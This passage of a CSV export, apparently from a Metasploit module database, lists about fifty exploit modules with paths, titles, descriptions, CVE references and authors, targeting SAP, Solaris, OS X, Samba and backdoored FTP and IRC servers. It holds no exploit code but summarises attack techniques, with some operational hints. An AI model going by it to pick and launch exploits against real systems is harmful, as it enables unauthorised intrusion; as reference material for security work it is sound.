21:30:07","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb","exploit","multi/sap/sap_soap_rfc_sxpg_call_system_exec","exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec","SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",500,"This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP RFC Service, to execute remote commands. This module needs SAP credentials with privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested successfully on Windows 2008 64-bit and Linux 64-bit platforms.","Metasploit Framework License (BSD)","f","2013-03-26 00:00:00",0,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/","nmonkee" 200,"2013-05-13 21:30:07","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb","exploit","multi/sap/sap_soap_rfc_sxpg_command_exec","exploit/multi/sap/sap_soap_rfc_sxpg_command_exec","SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",500,"This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP SOAP RFC Service, to execute remote commands. This module needs SAP credentials with privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested successfully on Windows 2008 64-bit and Linux 64-bit platforms.","Metasploit Framework License (BSD)","f","2012-05-08 00:00:00",0,,"aggressive","t","URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection, URL-https://service.sap.com/sap/support/notes/1341333, URL-https://service.sap.com/sap/support/notes/1764994","nmonkee" 201,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/ssh/sshexec.rb","exploit","multi/ssh/sshexec","exploit/multi/ssh/sshexec","SSH User Code Execution",0,"This module utilizes a stager to upload a base64 encoded binary which is then decoded, chmod'ed and executed from the command shell.","Metasploit Framework License (BSD)","t","1999-01-01 00:00:00",0,,"aggressive","t","CVE-1999-0502","Brandon Knight, Spencer McIntyre" 202,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/svn/svnserve_date.rb","exploit","multi/svn/svnserve_date","exploit/multi/svn/svnserve_date","Subversion Date Svnserve",200,"This is an exploit for the Subversion date parsing overflow. This exploit is for the svnserve daemon (svn:// protocol) and will not work for Subversion over webdav (http[s]://). This exploit should never crash the daemon, and should be safe to do multi-hits. **WARNING** This exploit seems to (not very often, I've only seen it during testing) corrupt the subversion database, so be careful!","Metasploit Framework License (BSD)","f","2004-05-19 00:00:00",,,"aggressive","t","BID-10386, CVE-2004-0397, OSVDB-6301, URL-http://lists.netsys.com/pipermail/full-disclosure/2004-May/021737.html","spoonm " 203,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb","exploit","multi/upnp/libupnp_ssdp_overflow","exploit/multi/upnp/libupnp_ssdp_overflow","Portable UPnP SDK unique_service_name() Remote Code Execution",300,"This module exploits a buffer overflow in the unique_service_name() function of libupnp's SSDP processor. The libupnp library is used across thousands of devices and is referred to as the Intel SDK for UPnP Devices or the Portable SDK for UPnP Devices. Due to size limitations on many devices, this exploit uses a separate TCP listener to stage the real payload.","Metasploit Framework License (BSD)","t","2013-01-29 00:00:00",0,,"aggressive","t","CVE-2012-5958, URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play, US-CERT-VU-922681","Alex Eubanks , Richard Harman , hdm " 204,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb","exploit","multi/wyse/hagent_untrusted_hsdata","exploit/multi/wyse/hagent_untrusted_hsdata","Wyse Rapport Hagent Fake Hserver Command Execution",600,"This module exploits the Wyse Rapport Hagent service by pretending to be a legitimate server. This process involves starting both HTTP and FTP services on the attacker side, then contacting the Hagent service of the target and indicating that an update is available. The target will then download the payload wrapped in an executable from the FTP service.","Metasploit Framework License (BSD)","t","2009-07-10 00:00:00",0,,"aggressive","t","CVE-2009-0695, OSVDB-55839, URL-http://snosoft.blogspot.com/, URL-http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/, URL-http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf, URL-http://www.wyse.com/serviceandsupport/support/WSB09-01.zip, US-CERT-VU-654545","kf " 205,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/netware/smb/lsass_cifs.rb","exploit","netware/smb/lsass_cifs","exploit/netware/smb/lsass_cifs","Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow",200,"This module exploits a stack buffer overflow in the NetWare CIFS.NLM driver. Since the driver runs in the kernel space, a failed exploit attempt can cause the OS to reboot.","Metasploit Framework License (BSD)","t","2007-01-21 00:00:00",,,"aggressive","t","CVE-2005-2852, OSVDB-12790","toto" 206,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/netware/sunrpc/pkernel_callit.rb","exploit","netware/sunrpc/pkernel_callit","exploit/netware/sunrpc/pkernel_callit","NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure. PKERNEL.NLM is installed by default on all NetWare servers to support NFS. The PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can cause the operating system to reboot.","Metasploit Framework License (BSD)","t","2009-09-30 00:00:00",,,"aggressive","t","BID-36564, OSVDB-58447, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-067/","pahtzo" 207,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/afp/loginext.rb","exploit","osx/afp/loginext","exploit/osx/afp/loginext","AppleFileServer LoginExt PathName Overflow",200,"This module exploits a stack buffer overflow in the AppleFileServer service on MacOS X. This vulnerability was originally reported by Atstake and was actually one of the few useful advisories ever published by that company. You only have one chance to exploit this bug. This particular exploit uses a stack-based return address that will only work under optimal conditions.","Metasploit Framework License (BSD)","f","2004-05-03 00:00:00",,,"aggressive","t","BID-10271, CVE-2004-0430, OSVDB-5762","hdm " 208,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/arkeia/type77.rb","exploit","osx/arkeia/type77","exploit/osx/arkeia/type77","Arkeia Backup Client Type 77 Overflow (Mac OS X)",200,"This module exploits a stack buffer overflow in the Arkeia backup client for the Mac OS X platform. This vulnerability affects all versions up to and including 5.3.3 and has been tested with Arkeia 5.3.1 on Mac OS X 10.3.5.","Metasploit Framework License (BSD)","t","2005-02-18 00:00:00",0,,"aggressive","t","BID-12594, CVE-2005-0491, OSVDB-14011, URL-http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html","hdm " 209,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/browser/mozilla_mchannel.rb","exploit","osx/browser/mozilla_mchannel","exploit/osx/browser/mozilla_mchannel","Mozilla Firefox 3.6.16 mChannel Use-After-Free",300,"This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element, mChannel, can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.","Metasploit Framework License (BSD)","f","2011-05-10 00:00:00",0,,"passive","t","CVE-2011-0065, OSVDB-72085, URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986","Rh0, argp , regenrecht" 210,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/browser/safari_file_policy.rb","exploit","osx/browser/safari_file_policy","exploit/osx/browser/safari_file_policy","Apple Safari file:// Arbitrary Code Execution",300,"This module exploits a vulnerability found in Apple Safari on OS X platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OS X might automount), and then execute it in /Volumes/[share]. If there's some kind of bug that leaks the victim machine's current username, then it's also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.","Metasploit Framework License (BSD)","t","2011-10-12 00:00:00",0,,"passive","t","CVE-2011-3230, URL-http://support.apple.com/kb/HT5000, URL-http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments","Aaron Sigel, sinn3r " 211,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/browser/safari_metadata_archive.rb","exploit","osx/browser/safari_metadata_archive","exploit/osx/browser/safari_metadata_archive","Safari Archive Metadata Command Execution",600,"This module exploits a vulnerability in Safari's ""Safe file"" feature, which will automatically open any file with one of the allowed extensions. This can be abused by supplying a zip file, containing a shell script, with a metafile indicating that the file should be opened by Terminal.app. This module depends on the 'zip' command-line utility.","Metasploit Framework License (BSD)","f","2006-02-21 00:00:00",0,,"passive","t","BID-16736, CVE-2006-0848, OSVDB-23510","hdm " 212,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/browser/software_update.rb","exploit","osx/browser/software_update","exploit/osx/browser/software_update","Apple OS X Software Update Command Execution",600,"This module exploits a feature in the Distribution Packages, which are used in the Apple Software Update mechanism. This feature allows for arbitrary command execution through JavaScript. This exploit provides the malicious update server. Requests must be redirected to this server by other means for this exploit to work.","Metasploit Framework License (BSD)","f","2007-12-17 00:00:00",0,,"passive","t","CVE-2007-5863, OSVDB-40722","Moritz Jodeit " 213,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/email/mailapp_image_exec.rb","exploit","osx/email/mailapp_image_exec","exploit/osx/email/mailapp_image_exec","Mail.app Image Attachment Command Execution",0,"This module exploits a command execution vulnerability in the Mail.app application shipped with Mac OS X 10.5.0. This flaw was patched in 10.4 in March of 2007, but reintroduced into the final release of 10.5.","Metasploit Framework License (BSD)","f","2006-03-01 00:00:00",,,"passive","t","BID-16907, BID-26510, CVE-2006-0395, CVE-2007-6165, OSVDB-40875","hdm , kf " 214,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/ftp/webstar_ftp_user.rb","exploit","osx/ftp/webstar_ftp_user","exploit/osx/ftp/webstar_ftp_user","WebSTAR FTP Server USER Overflow",200,"This module exploits a stack buffer overflow in the logging routine of the WebSTAR FTP server. Reliable code execution is obtained by a series of hops through the System library.","Metasploit Framework License (BSD)","t","2004-07-13 00:00:00",0,,"aggressive","t","BID-10720, CVE-2004-0695, OSVDB-7794","ddz , hdm " 215,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/http/evocam_webserver.rb","exploit","osx/http/evocam_webserver","exploit/osx/http/evocam_webserver","MacOS X EvoCam HTTP GET Buffer Overflow",200,"This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerablity.","Metasploit Framework License (BSD)","f","2010-06-01 00:00:00",1,,"aggressive","t","CVE-2010-2309, EDB-12835, OSVDB-65043","Paul Harrington, dookie" 216,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/local/setuid_tunnelblick.rb","exploit","osx/local/setuid_tunnelblick","exploit/osx/local/setuid_tunnelblick","Setuid Tunnelblick Privilege Escalation",600,"This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 over Mac OS X 10.7.5.","Metasploit Framework License (BSD)","f","2012-08-11 00:00:00",0,,"aggressive","t","CVE-2012-3485, EDB-20443, URL-http://blog.zx2c4.com/791","Jason A. Donenfeld, juan vazquez " 217,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/local/setuid_viscosity.rb","exploit","osx/local/setuid_viscosity","exploit/osx/local/setuid_viscosity","Viscosity setuid-set ViscosityHelper Privilege Escalation",600,"This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient validation of path names allows execution of arbitrary python code as root. This module has been tested successfully on Viscosity 1.4.1 over Mac OS X 10.7.5.","Metasploit Framework License (BSD)","f","2012-08-12 00:00:00",0,,"aggressive","t","CVE-2012-4284, EDB-20485, OSVDB-84709, URL-http://blog.zx2c4.com/791","Jason A. Donenfeld, juan vazquez " 218,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/mdns/upnp_location.rb","exploit","osx/mdns/upnp_location","exploit/osx/mdns/upnp_location","Mac OS X mDNSResponder UPnP Location Overflow",200,"This module exploits a buffer overflow that occurs when processing specially crafted requests set to mDNSResponder. All Mac OS X systems between version 10.4 and 10.4.9 (without the 2007-005 patch) are affected.","Metasploit Framework License (BSD)","f","2007-05-25 00:00:00",1,,"aggressive","t","BID-24144, CVE-2007-2386, OSVDB-35142, URL-http://support.apple.com/kb/TA24732","ddz " 219,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/misc/ufo_ai.rb","exploit","osx/misc/ufo_ai","exploit/osx/misc/ufo_ai","UFO: Alien Invasion IRC Client Buffer Overflow",200,"This module exploits a buffer overflow in the IRC client component of UFO: Alien Invasion 2.2.1.","Metasploit Framework License (BSD)","f","2009-10-28 00:00:00",0,,"passive","t","EDB-14013, OSVDB-65689","Jason Geffner, dookie" 220,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb","exploit","osx/rtsp/quicktime_rtsp_content_type","exploit/osx/rtsp/quicktime_rtsp_content_type","MacOS X QuickTime RTSP Content-Type Overflow",200,"No module description","Metasploit Framework License (BSD)","f","2007-11-23 00:00:00",2,,"passive","t","BID-26549, CVE-2007-6166, OSVDB-40876","unknown" 221,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/samba/lsa_transnames_heap.rb","exploit","osx/samba/lsa_transnames_heap","exploit/osx/samba/lsa_transnames_heap","Samba lsa_io_trans_names Heap Overflow",200,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the szone_free() to overwrite the size() or free() pointer in initial_malloc_zones structure.","Metasploit Framework License (BSD)","t","2007-05-14 00:00:00",,,"aggressive","t","CVE-2007-2446, OSVDB-34699","Adriano Lima , Ramon de C Valle , hdm " 222,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/osx/samba/trans2open.rb","exploit","osx/samba/trans2open","exploit/osx/samba/trans2open","Samba trans2open Overflow (Mac OS X PPC)",500,"This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",0,,"aggressive","t","BID-7294, CVE-2003-0201, OSVDB-4469, URL-http://seclists.org/bugtraq/2003/Apr/103","hdm , jduck " 223,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/generic_exec.rb","exploit","pro/web/generic_exec","exploit/pro/web/generic_exec","Generic Web Application Unix Command Execution",600,"This module can be used to exploit any generic command execution vulnerability for CGI applications on Unix-like platforms. To use this module, specify the CMDURI path, replacing the command itself with !payload!.","Metasploit Framework License (BSD)","f","1993-11-14 00:00:00",0,,"aggressive","t",,"hdm , tasos" 224,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/http_put_asp.rb","exploit","pro/web/http_put_asp","exploit/pro/web/http_put_asp","HTTP PUT ASP/.NET Upload",0,,"BSD License","f","2008-10-13 00:00:00",0,,"aggressive","t",,"thelightcosine" 225,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/http_put_php.rb","exploit","pro/web/http_put_php","exploit/pro/web/http_put_php","Generic PHP Code Evaluation",0,"Exploits things like It is likely that HTTP evasion options will break this exploit.","BSD License","f","2008-10-13 00:00:00",0,,"aggressive","t",,"egypt , tasos" 226,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/php_eval.rb","exploit","pro/web/php_eval","exploit/pro/web/php_eval","Generic PHP Code Evaluation",0,"Exploits things like It is likely that HTTP evasion options will break this exploit.","BSD License","f","2008-10-13 00:00:00",0,,"aggressive","t",,"egypt , tasos" 227,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/php_include.rb","exploit","pro/web/php_include","exploit/pro/web/php_include","PHP Remote File Include Generic Code Execution",300,"This module can be used to exploit any generic PHP file include vulnerability, where the application includes code like the following: ","Metasploit Framework License (BSD)","f","2006-12-17 00:00:00",0,,"aggressive","t",,"egypt , ethicalhack3r, hdm , tasos" 228,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/sqli_mssql.rb","exploit","pro/web/sqli_mssql","exploit/pro/web/sqli_mssql","SQL injection exploit for MSSQL",0,,"BSD License","f","2000-05-30 00:00:00",0,,"aggressive","t",,"tasos" 229,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/sqli_mysql.rb","exploit","pro/web/sqli_mysql","exploit/pro/web/sqli_mysql","SQL injection exploit for MySQL",0,,"BSD License","f","2007-06-05 00:00:00",1,,"aggressive","t",,"egypt , tasos" 230,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/sqli_mysql_php.rb","exploit","pro/web/sqli_mysql_php","exploit/pro/web/sqli_mysql_php","SQL injection exploit for MySQL",0,,"BSD License","f","2000-05-30 00:00:00",0,,"aggressive","t",,"tasos" 231,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/web/sqli_postgres.rb","exploit","pro/web/sqli_postgres","exploit/pro/web/sqli_postgres","SQL injection exploit for PostgreSQL",0,,"BSD License","f","2007-06-05 00:00:00",1,,"aggressive","t",,"egypt , tasos" 232,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/exploits/pro/windows/dynamic_exe.rb","exploit","pro/windows/dynamic_exe","exploit/pro/windows/dynamic_exe","PRO: Payload Dynamic EXE Generator",500,"This module takes a Windows payload and generates a dynamic EXE wrapper around it.","Metasploit Framework License (BSD)","f",,0,,"aggressive","t",,"thelightcosine" 233,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/dtspcd/heap_noir.rb","exploit","solaris/dtspcd/heap_noir","exploit/solaris/dtspcd/heap_noir","Solaris dtspcd Heap Overflow",500,"This is a port of noir's dtspcd exploit. This module should work against any vulnerable version of Solaris 8 (sparc). The original exploit code was published in the book Shellcoder's Handbook.","Metasploit Framework License (BSD)","t","2002-07-10 00:00:00",0,,"aggressive","t","BID-3517, CVE-2001-0803, OSVDB-4503, URL-http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip, URL-http://www.cert.org/advisories/CA-2001-31.html","hdm , noir " 234,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/lpd/sendmail_exec.rb","exploit","solaris/lpd/sendmail_exec","exploit/solaris/lpd/sendmail_exec","Solaris LPD Command Execution",600,"This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Sun Solaris up to and including 8.0. This module uses a technique discovered by Dino Dai Zovi to exploit the flaw without needing to know the resolved name of the attacking system.","Metasploit Framework License (BSD)","f","2001-08-31 00:00:00",0,,"aggressive","t","BID-3274, CVE-2001-1583, OSVDB-15131","ddz , hdm " 235,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/samba/lsa_transnames_heap.rb","exploit","solaris/samba/lsa_transnames_heap","exploit/solaris/samba/lsa_transnames_heap","Samba lsa_io_trans_names Heap Overflow",200,"This module triggers a heap overflow in the LSA RPC service of the Samba daemon. This module uses the TALLOC chunk overwrite method (credit Ramon and Adriano), which only works with Samba versions 3.0.21-3.0.24. Additionally, this module will not work when the Samba ""log level"" parameter is higher than ""2"".","Metasploit Framework License (BSD)","t","2007-05-14 00:00:00",0,,"aggressive","t","CVE-2007-2446, OSVDB-34699","Adriano Lima , Ramon de C Valle , hdm " 236,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/samba/trans2open.rb","exploit","solaris/samba/trans2open","exploit/solaris/samba/trans2open","Samba trans2open Overflow (Solaris SPARC)",500,"This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",0,,"aggressive","t","BID-7294, CVE-2003-0201, OSVDB-4469, URL-http://seclists.org/bugtraq/2003/Apr/103","hdm , jduck " 237,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb","exploit","solaris/sunrpc/sadmind_adm_build_path","exploit/solaris/sunrpc/sadmind_adm_build_path","Sun Solaris sadmind adm_build_path() Buffer Overflow",500,"This module exploits a buffer overflow vulnerability in adm_build_path() function of sadmind daemon. The distributed system administration daemon (sadmind) is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received. The sadmind daemon process continues to run for 15 minutes after the last request is completed, unless a different idle-time is specified with the -i command line option. The sadmind daemon may be started independently from the command line, for example, at system boot time. In this case, the -i option has no effect; sadmind continues to run, even if there are no active requests.","Metasploit Framework License (BSD)","t","2008-10-14 00:00:00",0,,"aggressive","t","CVE-2008-4556, OSVDB-49111, URL-http://risesecurity.org/advisories/RISE-2008001.txt","Adriano Lima , Ramon de C Valle " 238,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/sunrpc/sadmind_exec.rb","exploit","solaris/sunrpc/sadmind_exec","exploit/solaris/sunrpc/sadmind_exec","Solaris sadmind Command Execution",600,"This exploit targets a weakness in the default security settings of the sadmind RPC application. This server is installed and enabled by default on most versions of the Solaris operating system. Vulnerable systems include solaris 2.7, 8, and 9","Metasploit Framework License (BSD)","t","2003-09-13 00:00:00",0,,"aggressive","t","BID-8615, CVE-2003-0722, OSVDB-4585, URL-http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html","cazz , hdm , vlad902 " 239,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/sunrpc/ypupdated_exec.rb","exploit","solaris/sunrpc/ypupdated_exec","exploit/solaris/sunrpc/ypupdated_exec","Solaris ypupdated Command Execution",600,"This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option.","Metasploit Framework License (BSD)","t","1994-12-12 00:00:00",0,,"aggressive","t","BID-1749, CVE-1999-0209, OSVDB-11517","I)ruid " 240,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/telnet/fuser.rb","exploit","solaris/telnet/fuser","exploit/solaris/telnet/fuser","Sun Solaris Telnet Remote Authentication Bypass Vulnerability",600,"This module exploits the argument injection vulnerabilty in the telnet daemon (in.telnetd) of Solaris 10 and 11.","Metasploit Framework License (BSD)","f","2007-02-12 00:00:00",0,,"aggressive","t","BID-22512, CVE-2007-0882, OSVDB-31881","MC " 241,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/solaris/telnet/ttyprompt.rb","exploit","solaris/telnet/ttyprompt","exploit/solaris/telnet/ttyprompt","Solaris in.telnetd TTYPROMPT Buffer Overflow",600,"This module uses a buffer overflow in the Solaris 'login' application to bypass authentication in the telnet daemon.","Metasploit Framework License (BSD)","f","2002-01-18 00:00:00",0,,"aggressive","t","BID-5531, CVE-2001-0797, OSVDB-690","MC , cazz " 242,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb","exploit","unix/ftp/proftpd_133c_backdoor","exploit/unix/ftp/proftpd_133c_backdoor","ProFTPD-1.3.3c Backdoor Command Execution",600,"This module exploits a malicious backdoor that was added to the ProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz] archive between November 28th 2010 and 2nd December 2010.","Metasploit Framework License (BSD)","t","2010-12-02 00:00:00",0,,"aggressive","t","BID-45150, OSVDB-69562, URL-http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org","MC , darkharper2" 243,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb","exploit","unix/ftp/vsftpd_234_backdoor","exploit/unix/ftp/vsftpd_234_backdoor","VSFTPD v2.3.4 Backdoor Command Execution",600,"This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.","Metasploit Framework License (BSD)","t","2011-07-03 00:00:00",0,,"aggressive","t","OSVDB-73573, URL-http://pastebin.com/AetT9sS5, URL-http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html","MC , hdm " 244,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/http/contentkeeperweb_mimencode.rb","exploit","unix/http/contentkeeperweb_mimencode","exploit/unix/http/contentkeeperweb_mimencode","ContentKeeper Web Remote Command Execution",600,"This module exploits the ContentKeeper Web Appliance. Versions prior to 125.10 are affected. This module exploits a combination of weaknesses to enable remote command execution as the Apache user. By setting SkipEscalation to false, this module will attempt to setuid the bash shell.","Metasploit Framework License (BSD)","f","2009-02-25 00:00:00",0,,"aggressive","t","OSVDB-54551, OSVDB-54552, URL-http://www.aushack.com/200904-contentkeeper.txt","patrick " 245,"2013-05-17 08:19:11","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/http/ctek_skyrouter.rb","exploit","unix/http/ctek_skyrouter","exploit/unix/http/ctek_skyrouter","CTEK SkyRouter 4200 and 4300 Command Execution",200,"This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.","Metasploit Framework License (BSD)","f","2011-09-08 00:00:00",0,,"aggressive","t","URL-http://dev.metasploit.com/redmine/issues/5610","savant42" 246,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/http/freepbx_callmenum.rb","exploit","unix/http/freepbx_callmenum","exploit/unix/http/freepbx_callmenum","FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution",0,"This module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code to the '$channel' variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs.","Metasploit Framework License (BSD)","f","2012-03-20 00:00:00",0,,"aggressive","t","CVE-2005-2561, EDB-18649","Martin Tschirsich, muts" 247,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/http/lifesize_room.rb","exploit","unix/http/lifesize_room","exploit/unix/http/lifesize_room","LifeSize Room Command Injection",600,"This module exploits a vulnerable resource in LifeSize Room versions 3.5.3 and 4.7.18 to inject OS commmands. LifeSize Room is an appliance and thus the environment is limited resulting in a small set of payload options.","Metasploit Framework License (BSD)","f","2011-07-13 00:00:00",0,,"aggressive","t","CVE-2011-2763, OSVDB-75212","Spencer McIntyre" 248,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb","exploit","unix/irc/unreal_ircd_3281_backdoor","exploit/unix/irc/unreal_ircd_3281_backdoor","UnrealIRCD 3.2.8.1 Backdoor Command Execution",600,"This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.","Metasploit Framework License (BSD)","f","2010-06-12 00:00:00",0,,"aggressive","t","CVE-2010-2075, OSVDB-65445, URL-http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt","hdm " 249,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/unix/local/setuid_nmap.rb","exploit","unix/local/setuid_nmap","exploit/unix/local/setuid_nmap","Setuid Nmap Exploit",600,"Nmap's man page mentions that ""Nmap should never be installed with special privileges (e.g. suid root) for security reasons.."" and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.","Metasploit Framework License (BSD)","f","2012-07-19 00:00:00",0,,"aggressive","t",,"egypt " 250,"2013-05-07 